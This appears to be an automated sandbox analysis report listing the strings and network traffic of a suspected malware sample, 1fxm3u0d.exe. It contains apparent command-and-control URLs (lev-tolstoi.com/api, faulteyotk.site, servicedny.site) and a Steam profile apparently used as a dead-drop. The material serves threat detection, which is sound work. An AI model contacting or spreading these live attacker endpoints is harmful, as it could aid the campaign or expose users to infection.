Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://faulteyotk.site/api(
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.000000000336E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: 1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/A
Source: 1fxm3u0d.exe, 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/U
Source: 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320587716.000000000340F000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: 1fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api0
Source: 1fxm3u0d.exe, 00000003.00000003.2258095932.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2257813367.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api30Qy
Source: 1fxm3u0d.exe, 00000003.00000003.2166952473.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apic
Source: 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apidE
Source: 1fxm3u0d.exe, 00000003.00000002.2386928574.0000000003417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apimalISo
Source: 1fxm3u0d.exe, 00000003.00000003.2381498811.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.0000000003390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: 1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/r
Source: 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://servicedny.site/apiP
Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900cs
Source: 1fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/w
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
